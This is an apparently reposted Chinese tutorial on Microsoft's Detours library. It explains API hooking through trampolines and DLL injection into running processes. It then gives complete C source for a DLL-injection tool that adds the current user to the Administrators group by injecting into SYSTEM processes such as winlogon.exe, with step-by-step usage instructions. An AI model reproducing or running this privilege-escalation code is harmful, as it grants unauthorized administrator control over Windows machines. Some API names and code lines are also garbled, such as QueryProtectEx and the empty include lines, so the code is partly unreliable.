關於Detours的一些介紹(出處不詳)

--- Detours是微軟開發的一個函數庫（源代碼可在http://research.microsoft.com/sn/detours 免費獲得）, 用於修改運行中的程序在內存中的影像，從而即使沒有源代碼也能改變程序的行爲。具體用途是：

攔截WIN32 API調用，將其引導到自己的子程序，從而實現WIN32 API的定製。
爲一個已在運行的進程創建一新線程，裝入自己的代碼並運行。
---- 本文將簡介Detours的原理，Detours庫函數的用法， 並利用Detours庫函數在Windows NT上編寫了一個程序，該程序能使有“調試程序”的用戶權限的用戶成爲系統管理員，附錄利用Detours庫函數修改該程序使普通用戶即可成爲系統管理員 （在NT4 SP3上）。

一． Detours的原理

---- 1． WIN32進程的內存管理

---- 總所周知，WINDOWS NT實現了虛擬存儲器，每一WIN32進程擁有4GB的虛存空間， 關於WIN32進程的虛存結構及其操作的具體細節請參閱WIN32 API手冊， 以下僅指出與Detours相關的幾點：

---- (1) 進程要執行的指令也放在虛存空間中
---- (2) 可以使用QueryProtectEx函數把存放指令的頁面的權限更改爲可讀可寫可執行，再改寫其內容，從而修改正在運行的程序
---- (3) 可以使用VirtualAllocEx從一個進程爲另一正運行的進程分配虛存，再使用 QueryProtectEx函數把頁面的權限更改爲可讀可寫可執行，並把要執行的指令以二進制機器碼的形式寫入，從而爲一個正在運行的進程注入任意的代碼

---- 2． 攔截WIN32 API的原理

---- Detours定義了三個概念：

---- (1) Target函數：要攔截的函數，通常爲Windows的API。
---- (2) Trampoline函數：Target函數的複製品。因爲Detours將會改寫Target函數，所以先把Target函數複製保存好，一方面仍然保存Target函數的過程調用語義，另一方面便於以後的恢復。
---- (3) Detour 函數：用來替代Target函數的函數。

---- Detours在Target函數的開頭加入JMP Address_of_ Detour_ Function指令（共5個字節）把對Target函數的調用引導到自己的Detour函數， 把Target函數的開頭的5個字節加上JMP Address_of_ Target _ Function+5作爲Trampoline函數。例子如下：

攔截前：Target _ Function：
   ；Target函數入口，以下爲假想的常見的子程序入口代碼
   push   ebp
   mov   ebp,   esp
   push   eax
   push   ebx
   Trampoline:
   ；以下是Target函數的繼續部分
   ……

攔截後： Target _ Function：
   jmp   Detour_Function
   Trampoline:
   ；以下是Target函數的繼續部分
   ……

   Trampoline_Function:
   ; Trampoline函數入口, 開頭的5個字節與Target函數相同
   push   ebp
   mov   ebp,   esp
   push   eax
   push   ebx
   ；跳回去繼續執行Target函數
   jmp   Target_Function+5
---- 3． 爲一個已在運行的進程裝入一個DLL

---- 以下是其步驟：

---- (1) 創建一個ThreadFuction，內容僅是調用LoadLibrary。
---- (2) 用VirtualAllocEx爲一個已在運行的進程分配一片虛存，並把權限更改爲可讀可寫可執行。
---- (3) 把ThreadFuction的二進制機器碼寫入這片虛存。
---- (4) 用CreateRemoteThread在該進程上創建一個線程，傳入前面分配的虛存的起始地址作爲線程函數的地址，即可爲一個已在運行的進程裝入一個DLL。通過DllMain 即可在一個已在運行的進程中運行自己的代碼。

二． Detours庫函數的用法

---- 因爲Detours軟件包並沒有附帶幫助文件，以下接口僅從剖析源代碼得出。

---- 1． PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)

---- 功能：從一DLL中找出一函數的入口地址
---- 參數：pszModule是DLL名，pszFunction是函數名。
---- 返回：名爲pszModule的DLL的名爲pszFunction的函數的入口地址
---- 說明：DetourFindFunction除使用GetProcAddress外，還直接分析DLL的文件頭，因此可以找到一些GetProcAddress找不到的函數入口。

---- 2． DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
---- 功能：該宏把名爲target_name 的Target函數生成Trampoline函數，以後調用 trampoline_prototype在語義上等於調用Target函數。

---- 3． BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour)
---- 功能：用Detour 函數攔截Target函數
---- 參數：pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype，pbDetour是 Detour 函數的入口地址。

---- 4． BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour)
---- 功能：恢復Target函數
---- 參數：pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype，pbDetour是 Detour 函數的入口地址。

---- 5． BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
---- 功能：爲一個已在運行的進程裝入一個DLL
---- 參數：hProcess是進程的句柄，lpDllName是要裝入的DLL名

三． 程序實例

---- 以一個能使有“調試程序”的用戶權限的用戶成爲系統管理員的程序做例子說明Detours 庫函數的用法。程序的設計思路是找一個以System帳號運行的進程，如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等，使用ContinueProcessWithDll在其中注入把當前用戶加入到 Administrators本地組的DLL，因爲該DLL在這些進程的安全上下文環境運行，所以有相應的權限。

---- 先編寫相應的DLL：

/*admin.dll, 當進程裝入時會把名爲szAccountName
   的用戶加入到Administrators本地組。*/

#include
#include
#include
#include

/*以下創建一共享段實現進程間的數據通訊，
   szAccountName 是用戶名，bPrepared說明
   szAccountName是否已初始化。*/

#pragma data_seg(".MYSHARE")
BOOL bPrepared=FALSE;
wchar_t szAccountName[100]={0};
#pragma data_seg()

#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/*程序調用SetAccountName設置要加入到Administrators
   本地組的用戶名，並通知DllMain
   已初始化szAccountName ，
   以後被裝入時可調用ElevatePriv */

__declspec(dllexport) VOID WINAPI
   SetAccountName(wchar_t *Name)
{
wcscpy(szAccountName,Name);
bPrepared=TRUE;
}

/*把名爲szAccountName的用戶加入
   到Administrators本地組*/

__declspec(dllexport) VOID WINAPI ElevatePriv()
{
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
NetLocalGroupAddMembers(NULL,L"Administrators",
3,(LPBYTE)&account,1);
}

__declspec(dllexport) ULONG WINAPI
DllMain(HINSTANCE hInstance,
DWORD dwReason, PVOID lpReserved)
{
switch (dwReason) {
   case DLL_THREAD_ATTACH:
   if (bPrepared)
     ElevatePriv();
}
return TRUE;
}

程序如下：

/*AddMeToAdministrators.exe 把當前用戶加入到
   Administrators本地組。使用方法爲：（1）
---- 運行任務管理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的進程ID （2）執行AddMeToAdministrators.exe procid, 其中procid爲（1）記下的進程ID （3）簽退再簽到，運行用戶管理器，即可發現自己已在Administrators本地組中。*/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用戶名稱*/

void GetCurrentUser(wchar_t *szName)
{
   HANDLE hProcess, hAccessToken;
   wchar_t InfoBuffer[1000],szAccountName[200],
   szDomainName[200];
   PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
   DWORD dwInfoBufferSize,dwAccountSize = 200,
   dwDomainSize = 200;
   SID_NAME_USE snu;

   hProcess = GetCurrentProcess();

   OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

   GetTokenInformation(hAccessToken,TokenUser,
   InfoBuffer,
       1000, &dwInfoBufferSize);

   LookupAccountSid(NULL, pTokenUser->User.Sid,
   szAccountName,
       &dwAccountSize,szDomainName, &dwDomainSize, &snu);
   wcscpy(szName,szDomainName);
   wcscat(szName,L"/");
   wcscat(szName,szAccountName);
}

/* EnablePrivilege啓用自己的“調試程序”的用戶權限*/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(),
             TOKEN_ADJUST_PRIVILEGES, &hToken))
   return FALSE;
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, szPrivName,
&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken, FALSE, &tp,
sizeof(tp), NULL, NULL);
return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
LPSTR lpszCmdLine, int
nCmdShow)
{
INT argc;
WCHAR **argv;
argv = CommandLineToArgvW(GetCommandLineW(),
&argc);
INT nProcessId = -1;
if (argc!=2){
   wprintf(L"usage %s pid", argv[0]);
   return 1;
}
nProcessId = _wtoi(argv[1]);
printf("%d ",nProcessId);
---- /*要成功執行ContinueProcessWithDll，要對winlogon.exe等進程的進程句柄有讀寫存儲器內容和創建線程的權限，EnablePrivilege使本進程有這樣的權利。*/

if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
   printf("AdjustTokenPrivilege Fail %u ",
(UINT)GetLastError());
   return 1;
}
HANDLE   gNewHandle =
OpenProcess(PROCESS_ALL_ACCESS
, TRUE, nProcessId);
if (!gNewHandle){
   printf("OpenProcess Fail %u ",
(UINT)GetLastError());
   return 1;
}
   wchar_t szName[100];
GetCurrentUser(szName);
SetAccountName(szName);
If (!ContinueProcessWithDll(gNewHandle,
L"c:/temp/admin.dll")) {
   printf("ContinueProcessWithDll failed %u",
(UINT)GetLastError());
   return 3;
}
return 0;
}
---- 因爲“調試程序”的用戶權限缺省情況下僅賦予給管理員，因此並不會造成安全漏洞。但該程序揭示出“調試程序”的用戶權限其實是至高無上的用戶權限，只能授予給可信用戶。

四． 結論 ---- Detours是一強大的工具，提供了簡單易用的函數接口來攔截WIN32 API調用和爲一個已在運行的進程裝入一個DLL。